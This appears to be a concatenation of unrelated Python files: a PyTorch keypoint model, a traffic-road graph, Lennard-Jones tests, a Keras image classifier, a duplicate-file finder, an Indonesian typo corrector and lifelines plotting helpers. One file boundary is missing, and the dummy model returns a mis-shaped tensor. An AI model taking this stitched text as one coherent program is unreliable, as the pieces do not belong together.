            nn.ReLU(),
            nn.MaxPool2d(2, 2),  #256,4,4
            nn.Dropout(p=0.4),
            nn.Flatten(),
            nn.Linear(256*4*4, 1024),
            nn.ReLU(),
            nn.Linear(1024, 256),
            nn.ReLU(),
            nn.Linear(256,30),
        )
    def forward(self, x):
        """Return the (N, 30) keypoint prediction for input batch *x*."""
        x = self.model(x)
        return x
    def general_step(self, batch, batch_idx, mode):
        """Shared train/val/test step: MSE between predicted and true keypoints.

        mse_loss is symmetric, so the (target, prediction) argument order is
        harmless here.
        """
        image, keypoints = batch['image'], batch['keypoints']
        predicted_keypoints = self.forward(image).view(-1, 15, 2)
        loss = F.mse_loss(keypoints, predicted_keypoints)
        return loss
    def general_end(self, outputs, mode):
        # average over all batches aggregated during one epoch
        avg_loss = torch.stack([x[mode + '_loss'] for x in outputs]).mean()
        return avg_loss
    def training_step(self, batch, batch_idx):
        """One optimization step; logs the loss for TensorBoard."""
        loss = self.general_step(batch, batch_idx, "train")
        tensorboard_logs = {'loss': loss}
        return {'loss': loss, 'log': tensorboard_logs}
    def validation_step(self, batch, batch_idx):
        """One validation batch; returns the loss for epoch aggregation."""
        loss = self.general_step(batch, batch_idx, "val")
        return {'val_loss': loss}
    def test_step(self, batch, batch_idx):
        """One test batch; returns the loss for epoch aggregation."""
        loss = self.general_step(batch, batch_idx, "test")
        return {'test_loss': loss}
    def configure_optimizers(self):
        """Adam over all model parameters with the configured learning rate."""
        optim = torch.optim.Adam(self.model.parameters(), lr=self.hparams["learning_rate"])
        return optim
class DummyKeypointModel(pl.LightningModule):
    """Dummy model always predicting the keypoints of the first train sample"""
    def __init__(self):
        super().__init__()
        # Hard-coded (1, 30) tensor: the 15 (x, y) keypoint pairs of the
        # first training sample, used as a constant baseline prediction.
        self.prediction = torch.tensor([[
            0.4685, -0.2319,
            -0.4253, -0.1953,
            0.2908, -0.2214,
            0.5992, -0.2214,
            -0.2685, -0.2109,
            -0.5873, -0.1900,
            0.1967, -0.3827,
            0.7656, -0.4295,
            -0.2035, -0.3758,
            -0.7389, -0.3573,
            0.0086, 0.2333,
            0.4163, 0.6620,
            -0.3521, 0.6985,
            0.0138, 0.6045,
            0.0190, 0.9076,
        ]])
    def forward(self, x):
        # Repeat the stored prediction once per batch element.
        # NOTE(review): four repeat factors on a (1, 30) tensor produce shape
        # (N, 1, 1, 30), not (N, 30) - confirm downstream consumers expect
        # this shape.
        return self.prediction.repeat(x.size()[0], 1, 1, 1)
|
import datetime
import math
from physics import Coordinates
from cars import Car
class Node(object):
    """A point on a road; cars that come within ``radius`` of it are
    considered to have arrived (and get filtered off the road)."""

    # capture distance: cars closer than this are swallowed by the node
    radius = 20

    def __init__(self, coord):
        assert isinstance(coord, Coordinates)
        self.coord = coord

    def __repr__(self):
        return '<Node %s>' % self.coord

    def filter(self, car):
        """Return True while *car* is still outside this node's radius."""
        distance = car.coordinates.distance(self.coord)
        return distance > self.radius
class Arc:
    """A directed edge of the road graph, joining two nodes.

    NOTE(review): defining __eq__ without __hash__ makes Arc unhashable on
    Python 3; the visible callers (Road) only keep arcs in lists.
    """

    def __init__(self, src, dest, index):
        assert isinstance(src, Node)
        assert isinstance(dest, Node)
        self.src = src
        self.dest = dest
        self.index = index

    def __repr__(self):
        return '<Arc (%s,%s)->(%s,%s)>' % (self.src.coord.x, self.src.coord.y,
                                           self.dest.coord.x, self.dest.coord.y)

    def __eq__(self, arc):
        # arcs are identified by their position in the road's arc chain
        return self.index == arc.index

    @property
    def angle(self):
        """Angle of the arc in radians, in (-pi, pi].

        Bug fix: the original computed math.atan(dy / dx) with a manual
        quadrant correction, which raised ZeroDivisionError for vertical
        arcs (dx == 0) and returned 0 instead of pi for arcs pointing
        straight left (dx < 0, dy == 0). math.atan2 implements the same
        quadrant logic and handles both edge cases correctly.
        """
        dx = float(self.dest.coord.x - self.src.coord.x)
        dy = float(self.dest.coord.y - self.src.coord.y)
        return math.atan2(dy, dx)

    @property
    def length(self):
        """Euclidean length of the arc."""
        return self.src.coord.distance(self.dest.coord)
class Road:
    """A road is just a graph. That's it.

    Holds the chain of arcs built from an ordered coordinate list, plus the
    cars currently driving along it.
    """

    def __init__(self, coords, max_cars=20, birth_frequency=5000):
        """Build the arc chain from an ordered list of coordinates.

        :param coords: ordered coordinates describing the road path
            (at least two points).
        :param max_cars: maximum number of cars alive at once.
        :param birth_frequency: minimum delay between car spawns, in ms.
        """
        self.hole = None  # final node: cars reaching it despawn
        self.cars = list()
        self.arcs = list()
        self.max_cars = max_cars
        self.birth_frequency = birth_frequency
        # epoch start, so the first car can spawn immediately
        self.last_car_generated_at = datetime.datetime(1970, 1, 1)
        assert len(coords) > 1
        src = None
        arc_index = 0
        for coord in coords:
            dest = Node(Coordinates(coord))
            if src:
                self.arcs.append(Arc(src, dest, arc_index))
                arc_index += 1
            src = dest
        self.hole = src

    def generate_cars(self, nb_cars):
        """Add new cars on the map if necessary.

        Spawns a car on the first arc when the spawn delay has elapsed and
        the road is not full.

        :param nb_cars: number of cars currently on the road.
        :return: the new Car, or None if nothing was spawned.
        """
        now = datetime.datetime.now()
        last_generation_delta = now - self.last_car_generated_at
        milliseconds_delta = sum((last_generation_delta.seconds * 1000,
                                  last_generation_delta.microseconds / 1000))
        new_car = None
        if milliseconds_delta > self.birth_frequency and nb_cars < self.max_cars:
            new_car = Car(self.arcs[0], 16)
            self.last_car_generated_at = now
        return new_car

    def leading_car(self, car):
        """Returns the next car.
        TODO: don't limit ourselves to the current arc.
        """
        # sentinel "infinitely far" car, returned when nobody is ahead
        next_car = Car(car.arc, 0, float('Inf'))
        next_car.total_distance = float('Inf')
        for other_car in self.cars:
            if all((other_car.total_distance > car.total_distance,
                    other_car.total_distance < next_car.total_distance)):
                next_car = other_car
        return next_car

    def pointlist(self):
        """Returns a list of tuples corresponding to the nodes coordinates.

        Interior nodes appear twice (as one arc's dest and the next arc's
        src); callers drawing the polyline rely on that pairing.
        """
        points = list()
        for arc in self.arcs:
            points.append((arc.src.coord.x, arc.src.coord.y))
            points.append((arc.dest.coord.x, arc.dest.coord.y))
        return points

    def update(self, delta):
        """Update the road status."""
        new_cars = self.generate_cars(len(self.cars))
        if new_cars:
            self.cars.append(new_cars)
        # Bug fix: on Python 3, filter() returns a lazy iterator; storing it
        # in self.cars made len(self.cars) raise TypeError on the next
        # update() call and would consume the cars on first iteration.
        # Materialize the surviving cars into a list.
        self.cars = list(filter(self.hole.filter, self.cars))
        for car in self.cars:
            car.update(self, delta)
            if car.distance >= car.arc.length:
                # NOTE(review): assumes a following arc exists; a car
                # finishing the LAST arc should already have been removed by
                # self.hole.filter above - confirm node radius guarantees it.
                arc = self.arcs[car.arc.index + 1]
                car.set_arc(arc)
|
"""
Test for mcsim package - monte carlo NumPy module.
"""
import math
import mcsim.monte_carlo_np as mc
import numpy as np
def test_calculate_distance_np_1():
    """
    calculate_distance_np: points separated by one unit along y are at
    distance 1 (no periodic box).
    """
    point1=np.array([0,0,0])
    point2=np.array([0,1,0])
    expected = np.array([1.0])
    observed = mc.calculate_distance_np(point1,point2)
    assert np.array_equal(expected, observed)
# write a test for the calculate distance function which tests for the periodic boundary conditions
# write a test for the calculate distance function which tests for the periodic boundary conditions
def test_calculate_distance_np2():
    """
    calculate_distance_np with a periodic box: separations are wrapped by
    the minimum-image convention (box_length = 3.3).
    """
    point1= np.array([[0, 0, 0],[0, 1, 0]])
    point2= np.array([[0, 8, 0],[0, 1.5, 0]])
    box_length = 3.3
    expected = np.array([1.4, 0.5])
    observed = mc.calculate_distance_np(point1,point2,box_length)
    assert np.allclose(expected, observed)
def test_calculate_lj_np_1():
    """
    Lennard-Jones pair energy is zero at reduced distance 1 (sigma).
    """
    assert mc.calculate_lj_np(1) == 0
def test_calculate_lj_np_2():
    """
    Lennard-Jones pair energy reaches its minimum of -1 at the well
    position r = 2^(1/6).
    """
    assert mc.calculate_lj_np(math.pow(2, (1/6))) == -1.0
def test_calculate_total_energy_np():
    """
    Total energy of three collinear particles spaced at the LJ minimum
    distance, with cutoff 3.0 (box length 10).
    """
    coordinates = np.array([[0, 0, 0], [0, math.pow(2, 1/6), 0], [0, 2*math.pow(2, 1/6), 0]])
    assert np.isclose(mc.calculate_total_energy_np(coordinates, 10, 3.0), -2.031005859375)
def test_calculate_pair_energy_np_1():
    """
    Pair energy of the MIDDLE particle in a three-particle chain: both
    neighbours sit at the LJ minimum, so the energy is -2.
    """
    coordinates = np.array([[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]])
    assert mc.calculate_pair_energy_np(coordinates, 1, 10, 3) == -2
def test_calculate_pair_energy_np_2():
    """
    Pair energy is symmetric: the first and last particles of the chain
    have identical pair energies.
    """
    coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
    assert mc.calculate_pair_energy_np(coordinates, 0, 10, 3) == mc.calculate_pair_energy_np(coordinates, 2, 10, 3)
# NOTE(review): name is missing the `_np` suffix used by its siblings;
# renaming would change which tests pytest reports, so it is kept as-is.
def test_calculate_pair_energy_3():
    """
    With cutoff 2 only the nearest neighbour contributes, so the end
    particle's pair energy is -1.
    """
    coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
    assert mc.calculate_pair_energy_np(coordinates, 0, 10, 2) == -1
|
import tensorflow as tf
import keras
import numpy as np
import os
import matplotlib.pyplot as plt
# Download and unpack the cats-vs-dogs dataset (cached by tf.keras).
URL = r'https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip'
path_to_zip = tf.keras.utils.get_file('cats_and_dogs.zip', origin=URL, extract=True)
PATH = os.path.join(os.path.dirname(path_to_zip), 'cats_and_dogs_filtered')
train_dir = os.path.join(PATH, 'train')
validation_dir = os.path.join(PATH, 'validation')
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, "dogs")
val_cats_dir = os.path.join(validation_dir, 'cats')
val_dogs_dir = os.path.join(validation_dir, 'dogs')
# Count images per split to size the epochs below.
train_total = len(os.listdir(train_cats_dir)) + len(os.listdir(train_dogs_dir))
val_total = len(os.listdir(val_cats_dir)) + len(os.listdir(val_dogs_dir))
print(train_total, val_total)
# Augmentation (flips/rotation/zoom/shifts) on the training set only;
# validation images are just rescaled.
train_image_gen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255, horizontal_flip=True, rotation_range=45, zoom_range=0.5, width_shift_range=.15, height_shift_range=.15)
val_image_gen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255)
train_data = train_image_gen.flow_from_directory(batch_size=16, directory=train_dir, target_size=(150, 150), class_mode='binary')
val_data = val_image_gen.flow_from_directory(batch_size=16, directory=validation_dir, target_size=(150, 150), class_mode='binary')
# Simple 4-block CNN with a sigmoid head for binary cat/dog classification.
model = keras.Sequential(
    [keras.layers.Conv2D(32, (3, 3), padding='same', activation="relu", input_shape=(150, 150, 3)),
     keras.layers.MaxPooling2D(),
     keras.layers.Conv2D(32, 3, padding='same', activation='relu'),
     keras.layers.MaxPooling2D(),
     keras.layers.Conv2D(64, 3, padding='same', activation='relu'),
     keras.layers.MaxPooling2D(),
     keras.layers.Conv2D(64, 3, padding='same', activation='relu'),
     keras.layers.MaxPooling2D(),
     keras.layers.Flatten(),
     keras.layers.Dense(64, activation='relu'),
     keras.layers.Dropout(.5),
     keras.layers.Dense(1, activation='sigmoid'),
     ]
)
model.summary()
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
# NOTE(review): fit_generator is deprecated in TF >= 2.1 (model.fit accepts
# generators directly) - confirm the pinned TF version before changing.
hist = model.fit_generator(train_data, epochs=50, steps_per_epoch=train_total//16, validation_data=val_data, validation_steps=val_total//16)
model.save_weights('image_weights.h5')
# Loss/accuracy curves; the hard-coded 50 must match epochs above.
epochs = range(50)
plt.figure(figsize=(10,10))
plt.subplot(1,2,1)
plt.plot(epochs, hist.history['loss'])
plt.plot(epochs, hist.history['val_loss'], 'ro')
plt.subplot(1,2,2)
plt.plot(epochs, hist.history['accuracy'])
plt.plot(epochs, hist.history['val_accuracy'], 'ro')
plt.show()
#!/usr/bin/env python
"""Report pairs of *txt files (found recursively under the current
directory) whose contents are byte-identical but whose first-level parent
directories differ."""
import os
import subprocess
import sys
import hashlib

# Fixes versus the original:
#  * the original was Python 2 only (`print` statement, implicit bytes/str
#    mixing) and could not run at all under Python 3;
#  * subprocess.check_output returns bytes, which must be decoded before
#    splitting into path strings;
#  * passing a one-element list together with shell=True only hands that
#    single string to the shell; an explicit argument list with the default
#    shell=False is both correct and injection-safe;
#  * files are opened with a context manager so handles are closed.
out = subprocess.check_output(['find', '.', '-name', '*txt']).decode()
stats = out.split('\n')

# (path, md5-of-content) for every file found; empty lines are skipped.
stats_md5 = []
for fname in stats:
    if not fname:
        continue
    with open(fname, 'rb') as fh:
        stats_md5.append((fname, hashlib.md5(fh.read()).digest()))

# Compare every ordered pair (so each match is reported twice, as in the
# original) and report identical contents living under different
# first-level directories ('./<dir>/...' -> split('/')[1]).
for i in stats_md5:
    for j in stats_md5:
        if i[0] == j[0]:
            continue
        if i[1] == j[1]:
            namei = i[0].split('/')[1]
            namej = j[0].split('/')[1]
            if namei != namej:
                print("Match!", i[0], j[0])
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
# Emit the two placeholder messages used to sanity-check the editor setup.
for message in ("Test", "New"):
    print(message)
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import re
class KataIndo:
    """Indonesian typo corrector backed by a Google Sheet.

    The sheet 'kata-typo-indo' holds one row per word:
    [correct_word, "typo1,typo2,..."].
    """

    def __init__(self):
        # Google API scopes + service-account credentials; opening the sheet
        # requires network access and a valid key file.
        self.scope = ['https://spreadsheets.google.com/feeds',
                      'https://www.googleapis.com/auth/drive']
        self.creds = ServiceAccountCredentials.from_json_keyfile_name(
            '../auth/kata-indo.json', self.scope)
        self.client = gspread.authorize(self.creds)
        self.typo_sheet = self.client.open('kata-typo-indo').sheet1
        # all rows, loaded once at construction time
        self.typo_words = self.typo_sheet.get_all_values()

    # Normalise a word (original comment: "Memperbagus kata")
    def fixWord(self, word):
        """Strip punctuation, then try to match the word's characters
        against every known word/typo; return the matched spelling.

        NOTE(review): implicitly returns None when no entry matches -
        setWord relies on that. The `break` after `return` is unreachable,
        and `chars3` used at the return site is whatever the inner loop
        last produced - confirm this heuristic is intended.
        """
        status = False
        # strip punctuation characters
        word = re.sub(r'[?|$|.|!|,|@|#|%|^|*|(|)|_|-|+|=|/|{|}|;|:|"|\'|\||[|\]|/|\||\\]',r'',word)
        chars1 = [char for char in word]
        for word_list in self.typo_words:
            # candidate spellings: all recorded typos plus the correct word
            words = word_list[1].split(",")+[word_list[0]]
            for wordx in words:
                chars2 = [char for char in wordx]
                chars3 = [item for item in chars2 if item in chars1]
                # heuristic: candidate's characters all occur in the input
                # and the input's character set is covered by the overlap
                if len(chars3) == len(chars2) and set(chars1).issubset(chars3):
                    status = True
                    break
            if status:
                word = ""
                return word.join(chars3)
                break

    # Translate a typo into its correct form (original: "Menerjemahkan kata typo")
    def setWord(self, search):
        """Return the corrected spelling of *search*, or *search* itself
        when it is not a known typo."""
        searchs = self.fixWord(search)
        if searchs is not None:
            for word_list in self.typo_words:
                word = word_list[1].split(",")
                if searchs in word:
                    return word_list[0]
                    # NOTE(review): unreachable after return
                    break
            return searchs
        else:
            return search

    # Join words back into a sentence (original: "Menyambungkan kata-kata menjadi kalimat")
    def listToString(self, list_word):
        sentence = " "
        return sentence.join(list_word)

    # Fix a whole sentence word by word (original: "Kalimat fix")
    def sentenceFix(self, sentence):
        word_split = sentence.split()
        sentence_fix = []
        for word in word_split:
            # word.replace(word, X) is equivalent to X; kept as-is to avoid
            # any behaviour change
            sentence_fix.append(word.replace(word, self.setWord(word)))
        return self.listToString(sentence_fix)
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import warnings
import numpy as np
from lifelines.utils import coalesce
def is_latex_enabled():
    """
    Return True when matplotlib is configured to render text through LaTeX
    (the ``text.usetex`` rcParam), False otherwise.
    """
    from matplotlib import rcParams

    return rcParams["text.usetex"]
def remove_spines(ax, sides):
    """
    Hide the named spines of an axes and return the axes.

    Parameters:
      ax: axes to operate on
      sides: iterable of spine names: top, left, bottom, right

    Examples:
      remove_spines(ax, ['top'])
      remove_spines(ax, ['top', 'bottom', 'right', 'left'])
    """
    for side_name in sides:
        spine = ax.spines[side_name]
        spine.set_visible(False)
    return ax
def move_spines(ax, sides, dists):
    """
    Shift spines relative to the figure and return the axes.

    Parameters:
      ax: axes to operate on
      sides: spine names to move (top, left, bottom, right)
      dists: float offsets, paired positionally with *sides*

    Example:
      move_spines(ax, sides=['left', 'bottom'], dists=[-0.02, 0.1])
    """
    for side_name, offset in zip(sides, dists):
        ax.spines[side_name].set_position(("axes", offset))
    return ax
def remove_ticks(ax, x=False, y=False):
    """
    Remove tick marks from the requested axes and return the axes.

    Parameters:
      ax: axes to work on
      x: if True, remove x ticks. Default False.
      y: if True, remove y ticks. Default False.

    Examples:
      remove_ticks(ax, x=True)
      remove_ticks(ax, x=True, y=True)
    """
    targets = []
    if x:
        targets.append(ax.xaxis)
    if y:
        targets.append(ax.yaxis)
    for axis in targets:
        axis.set_ticks_position("none")
    return ax
def add_at_risk_counts(*fitters, **kwargs):
    """
    Add counts showing how many individuals were at risk at each time point in
    survival/hazard plots.
    Arguments:
      One or several fitters, for example KaplanMeierFitter,
      NelsonAalenFitter, etc...
    Keyword arguments (all optional):
      ax: The axes to add the labels to. Default is the current axes.
      fig: The figure of the axes. Default is the current figure.
      labels: The labels to use for the fitters. Default is whatever was
              specified in the fitters' fit-function. Giving 'None' will
              hide fitter labels.
    Returns:
      ax: The axes which was used.
    Examples:
        # First train some fitters and plot them
        fig = plt.figure()
        ax = plt.subplot(111)
        f1 = KaplanMeierFitter()
        f1.fit(data)
        f1.plot(ax=ax)
        f2 = KaplanMeierFitter()
        f2.fit(data)
        f2.plot(ax=ax)
        # There are equivalent
        add_at_risk_counts(f1, f2)
        add_at_risk_counts(f1, f2, ax=ax, fig=fig)
        # This overrides the labels
        add_at_risk_counts(f1, f2, labels=['fitter one', 'fitter two'])
        # This hides the labels
        add_at_risk_counts(f1, f2, labels=None)
    """
    from matplotlib import pyplot as plt

    # Axes and Figure can't be None
    ax = kwargs.get("ax", None)
    if ax is None:
        ax = plt.gca()
    fig = kwargs.get("fig", None)
    if fig is None:
        fig = plt.gcf()
    if "labels" not in kwargs:
        labels = [f._label for f in fitters]
    else:
        # Allow None, in which case no labels should be used
        labels = kwargs["labels"]
        if labels is None:
            labels = [None] * len(fitters)
    # Create another axes where we can put size ticks
    ax2 = plt.twiny(ax=ax)
    # Move the ticks below existing axes
    # Appropriate length scaled for 6 inches. Adjust for figure size.
    ax2_ypos = -0.15 * 6.0 / fig.get_figheight()
    move_spines(ax2, ["bottom"], [ax2_ypos])
    # Hide all fluff
    remove_spines(ax2, ["top", "right", "bottom", "left"])
    # Set ticks and labels on bottom
    ax2.xaxis.tick_bottom()
    # Match tick numbers and locations
    ax2.set_xlim(ax.get_xlim())
    ax2.set_xticks(ax.get_xticks())
    # Remove ticks, need to do this AFTER moving the ticks
    remove_ticks(ax2, x=True, y=True)
    # Add population size at times: one stacked label per tick, one line per
    # fitter, counting durations that are still >= the tick time.
    ticklabels = []
    for tick in ax2.get_xticks():
        lbl = ""
        for f, l in zip(fitters, labels):
            # First tick is prepended with the label
            if tick == ax2.get_xticks()[0] and l is not None:
                if is_latex_enabled():
                    s = "\n{}\\quad".format(l) + "{}"
                else:
                    s = "\n{} ".format(l) + "{}"
            else:
                s = "\n{}"
            lbl += s.format(f.durations[f.durations >= tick].shape[0])
        ticklabels.append(lbl.strip())
    # Align labels to the right so numbers can be compared easily
    ax2.set_xticklabels(ticklabels, ha="right")
    # Add a descriptive headline.
    ax2.xaxis.set_label_coords(0, ax2_ypos)
    ax2.set_xlabel("At risk")
    plt.tight_layout()
    return ax
def plot_lifetimes(
    duration,
    event_observed=None,
    entry=None,
    left_truncated=False,
    sort_by_duration=False,
    event_observed_color="#A60628",
    event_censored_color="#348ABD",
    **kwargs
):
    """
    Retuns a lifetime plot, see examples: https://lifelines.readthedocs.io/en/latest/Survival%20Analysis%20intro.html#censorship
    Parameters
    -----------
    duration: (n,) numpy array or pd.Series
      duration subject was observed for.
    event_observed: (n,) numpy array or pd.Series
      array of booleans: True if event observed, else False.
    entry: (n,) numpy array or pd.Series
      offsetting the births away from t=0. This could be from left-truncation, or delayed entry into study.
    left_truncated: boolean
      if entry is provided, and the data is left-truncated, this will display additional information in the plot to reflect this.
    sort_by_duration: boolean
      sort by the duration vector
    Returns
    -------
    ax
    """
    set_kwargs_ax(kwargs)
    ax = kwargs.pop("ax")
    N = duration.shape[0]
    if N > 80:
        warnings.warn("For less visual clutter, you may want to subsample to less than 80 individuals.")
    # default: every subject experienced the event, entering at t=0
    if event_observed is None:
        event_observed = np.ones(N, dtype=bool)
    if entry is None:
        entry = np.zeros(N)
    if sort_by_duration:
        # order by length of lifetimes; probably not very informative.
        ix = np.argsort(duration, 0)
        duration = duration[ix]
        event_observed = event_observed[ix]
        entry = entry[ix]
    # one horizontal line per subject, from entry to entry + duration;
    # observed events are drawn in event_observed_color, censored in
    # event_censored_color
    for i in range(N):
        c = event_observed_color if event_observed[i] else event_censored_color
        ax.hlines(N - 1 - i, entry[i], entry[i] + duration[i], color=c, lw=1.5)
        if left_truncated:
            # dashed segment from t=0 to the (delayed) entry time
            ax.hlines(N - 1 - i, 0, entry[i], color=c, lw=1.0, linestyle="--")
        # marker only for observed events ("" draws no marker for censored)
        m = "" if not event_observed[i] else "o"
        ax.scatter(entry[i] + duration[i], N - 1 - i, color=c, marker=m, s=10)
    ax.set_ylim(-0.5, N)
    return ax
def set_kwargs_ax(kwargs):
    """Ensure *kwargs* carries an "ax" entry, creating a fresh figure and
    axes on demand (mutates *kwargs* in place)."""
    from matplotlib import pyplot as plt

    if "ax" not in kwargs:
        kwargs["ax"] = plt.figure().add_subplot(111)
def set_kwargs_color(kwargs):
    """Resolve the plot colour into kwargs["c"]: explicit "c", then "color",
    then the next colour of the target axes' line cycle (mutates kwargs)."""
    kwargs["c"] = coalesce(kwargs.get("c"), kwargs.get("color"), kwargs["ax"]._get_lines.get_next_color())
def set_kwargs_drawstyle(kwargs):
    """Default the plotting drawstyle to "steps-post" (mutates *kwargs*)."""
    kwargs.setdefault("drawstyle", "steps-post")
def create_dataframe_slicer(iloc, loc):
    """Return a function that slices a DataFrame by the user's loc/iloc
    choice.

    When neither is given the whole frame is returned; otherwise *loc* wins
    over *iloc* and the matching accessor is used.
    """
    if iloc is None and loc is None:
        selection = slice(None)
    else:
        selection = loc if loc is not None else iloc
    accessor = "loc" if loc is not None else "iloc"
    return lambda df: getattr(df, accessor)[selection]
def plot_loglogs(cls, loc=None, iloc=None, show_censors=False, censor_styles=None, **kwargs):
    """
    Specifies a plot of the log(-log(SV)) versus log(time) where SV is the estimated survival function.

    *cls* is a fitted estimator exposing event_table, predict and
    survival_function_; *loc*/*iloc* select a time-based or positional
    subsection of the curve (mutually exclusive).
    """
    def loglog(s):
        # complementary log-log transform of the survival values
        return np.log(-np.log(s))

    if (loc is not None) and (iloc is not None):
        raise ValueError("Cannot set both loc and iloc in call to .plot().")
    if censor_styles is None:
        censor_styles = {}
    set_kwargs_ax(kwargs)
    set_kwargs_color(kwargs)
    set_kwargs_drawstyle(kwargs)
    # log-scale the time axis; pandas handles the x log-scaling below
    kwargs["logx"] = True
    dataframe_slicer = create_dataframe_slicer(iloc, loc)
    # plot censors
    ax = kwargs["ax"]
    colour = kwargs["c"]
    if show_censors and cls.event_table["censored"].sum() > 0:
        cs = {"marker": "+", "ms": 12, "mew": 1}
        cs.update(censor_styles)
        times = dataframe_slicer(cls.event_table.loc[(cls.event_table["censored"] > 0)]).index.values.astype(float)
        v = cls.predict(times)
        # don't log times, as Pandas will take care of all log-scaling later.
        ax.plot(times, loglog(v), linestyle="None", color=colour, **cs)
    # plot estimate
    dataframe_slicer(loglog(cls.survival_function_)).plot(**kwargs)
    ax.set_xlabel("log(timeline)")
    ax.set_ylabel("log(-log(survival_function_))")
    return ax
def plot_estimate(
    cls,
    estimate=None,
    loc=None,
    iloc=None,
    show_censors=False,
    censor_styles=None,
    ci_legend=False,
    ci_force_lines=False,
    ci_alpha=0.25,
    ci_show=True,
    at_risk_counts=False,
    invert_y_axis=False,
    bandwidth=None,
    **kwargs
):
    """
    Plots a pretty figure of {0}.{1}
    (the placeholders are filled in by callers formatting __doc__).
    Matplotlib plot arguments can be passed in inside the kwargs, plus
    Parameters
    -----------
    show_censors: bool
        place markers at censorship events. Default: False
    censor_styles: bool
        If show_censors, this dictionary will be passed into the plot call.
    ci_alpha: bool
        the transparency level of the confidence interval. Default: 0.3
    ci_force_lines: bool
        force the confidence intervals to be line plots (versus default shaded areas). Default: False
    ci_show: bool
        show confidence intervals. Default: True
    ci_legend: bool
        if ci_force_lines is True, this is a boolean flag to add the lines' labels to the legend. Default: False
    at_risk_counts: bool
        show group sizes at time points. See function ``add_at_risk_counts`` for details. Default: False
    loc: slice
        specify a time-based subsection of the curves to plot, ex:
                 .plot(loc=slice(0.,10.))
        will plot the time values between t=0. and t=10.
    iloc: slice
        specify a location-based subsection of the curves to plot, ex:
                 .plot(iloc=slice(0,10))
        will plot the first 10 time points.
    invert_y_axis: bool
        boolean to invert the y-axis, useful to show cumulative graphs instead of survival graphs.
    bandwidth: float
        specify the bandwidth of the kernel smoother for the
        smoothed-hazard rate. Only used when called 'plot_hazard'.
    Returns
    -------
    ax:
        a pyplot axis object
    """
    # resolve axes/colour/estimate selection (validates loc vs iloc too)
    plot_estimate_config = PlotEstimateConfig(
        cls, estimate, loc, iloc, show_censors, censor_styles, bandwidth, **kwargs
    )
    dataframe_slicer = create_dataframe_slicer(iloc, loc)
    # optionally mark the censored observation times on the curve
    if show_censors and cls.event_table["censored"].sum() > 0:
        cs = {"marker": "+", "ms": 12, "mew": 1}
        cs.update(plot_estimate_config.censor_styles)
        times = dataframe_slicer(cls.event_table.loc[(cls.event_table["censored"] > 0)]).index.values.astype(float)
        v = cls.predict(times)
        plot_estimate_config.ax.plot(times, v, linestyle="None", color=plot_estimate_config.colour, **cs)
    # plot the (possibly sliced) estimate itself
    dataframe_slicer(plot_estimate_config.estimate_).plot(**plot_estimate_config.kwargs)
    # plot confidence intervals
    if ci_show:
        if ci_force_lines:
            # CI as two explicit lines in the curve's colour
            dataframe_slicer(plot_estimate_config.confidence_interval_).plot(
                linestyle="-",
                linewidth=1,
                color=[plot_estimate_config.colour],
                legend=ci_legend,
                drawstyle=plot_estimate_config.kwargs.get("drawstyle", "default"),
                ax=plot_estimate_config.ax,
                alpha=0.6,
            )
        else:
            # CI as a shaded band between the lower and upper columns
            x = dataframe_slicer(plot_estimate_config.confidence_interval_).index.values.astype(float)
            lower = dataframe_slicer(plot_estimate_config.confidence_interval_.filter(like="lower")).values[:, 0]
            upper = dataframe_slicer(plot_estimate_config.confidence_interval_.filter(like="upper")).values[:, 0]
            fill_between_steps(
                x,
                lower,
                y2=upper,
                ax=plot_estimate_config.ax,
                alpha=ci_alpha,
                color=plot_estimate_config.colour,
                linewidth=1.0,
            )
    if at_risk_counts:
        add_at_risk_counts(cls, ax=plot_estimate_config.ax)
    if invert_y_axis:
        # need to check if it's already inverted
        original_y_ticks = plot_estimate_config.ax.get_yticks()
        if not getattr(plot_estimate_config.ax, "__lifelines_inverted", False):
            # not inverted yet
            plot_estimate_config.ax.invert_yaxis()
            # don't ask.
            y_ticks = np.round(1.000000000001 - original_y_ticks, decimals=8)
            plot_estimate_config.ax.set_yticklabels(y_ticks)
            # flag the axes so a second call doesn't invert it back
            plot_estimate_config.ax.__lifelines_inverted = True
    return plot_estimate_config.ax
class PlotEstimateConfig:
    """Bundle of resolved plotting options shared by plot_estimate.

    Resolves the axes, colour and drawstyle into ``kwargs``, validates the
    loc/iloc choice, and selects the estimate and confidence-interval
    frames (with kernel smoothing when plotting a hazard).
    """
    def __init__(self, cls, estimate, loc, iloc, show_censors, censor_styles, bandwidth, **kwargs):
        self.censor_styles = coalesce(censor_styles, {})
        # fill in ax / colour / drawstyle defaults (mutates kwargs)
        set_kwargs_ax(kwargs)
        set_kwargs_color(kwargs)
        set_kwargs_drawstyle(kwargs)
        # fall back to the fitter's default estimate name when none is given
        self.estimate = coalesce(estimate, cls._estimate_name)
        self.loc = loc
        self.iloc = iloc
        self.show_censors = show_censors
        # plot censors
        self.ax = kwargs["ax"]
        self.colour = kwargs["c"]
        self.kwargs = kwargs
        if (self.loc is not None) and (self.iloc is not None):
            raise ValueError("Cannot set both loc and iloc in call to .plot().")
        if self.estimate == "hazard_":
            # hazards must be kernel-smoothed before plotting
            if bandwidth is None:
                raise ValueError("Must specify a bandwidth parameter in the call to plot_hazard.")
            self.estimate_ = cls.smoothed_hazard_(bandwidth)
            self.confidence_interval_ = cls.smoothed_hazard_confidence_intervals_(
                bandwidth, hazard_=self.estimate_.values[:, 0]
            )
        else:
            self.estimate_ = getattr(cls, self.estimate)
            self.confidence_interval_ = getattr(cls, "confidence_interval_")
def fill_between_steps(x, y1, y2=0, h_align="left", ax=None, **kwargs):
    """ Fills a hole in matplotlib: Fill_between for step plots.
    https://gist.github.com/thriveth/8352565
    Parameters :
    ------------
    x : array-like
        Array/vector of index values. These are assumed to be equally-spaced.
        If not, the result will probably look weird...
    y1 : array-like
        Array/vector of values to be filled under.
    y2 : array-Like
        Array/vector or bottom values for filled area. Default is 0.
    h_align : str
